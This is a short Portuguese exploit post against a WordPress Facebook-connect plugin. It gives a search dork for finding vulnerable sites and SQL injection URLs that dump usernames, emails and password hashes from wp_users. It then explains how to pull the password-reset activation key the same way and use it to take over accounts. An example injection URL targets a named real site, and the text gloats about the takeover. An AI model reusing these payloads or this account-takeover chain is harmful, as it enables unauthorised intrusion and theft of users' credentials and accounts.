Exploit Wordpress
DORK['1']:inurl:"/?fbconnect_action=myhome"
http://VULL.COM/?fbconnect_action=myhome&userid=2[BUG-SQL]
EXPLOIT:
Mostrando user,email,senha(user_login,user_email,user_pass):
http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--
Com o email do usuário em mãos, vá até o painel de administrador.
http://VULL.COM/wp-login.php
"click em Lost your password ?"
É peça uma nova senha enviando para o e-mail.
Agora vamos consultar a KEY gerada pelo wordpress CAMPO:KEY=user_activa
http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--
Vamos modificar a senha do usuario com a KEY CAPTURADA
http://VULL.COM/wp-login.php?action=rp&key=[KEY]&login=[NOME_USUARIO]
USANDO:
http://VULL.COM/wp-login.php?action=rp&key=65465465AWDAD46546465464&login=MARIA
Pronto agora só trocar a senha do usuario e seja feliz Hackeiro hahahahahaahaha.
EXEMPLO:
http://www.artkernel.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--
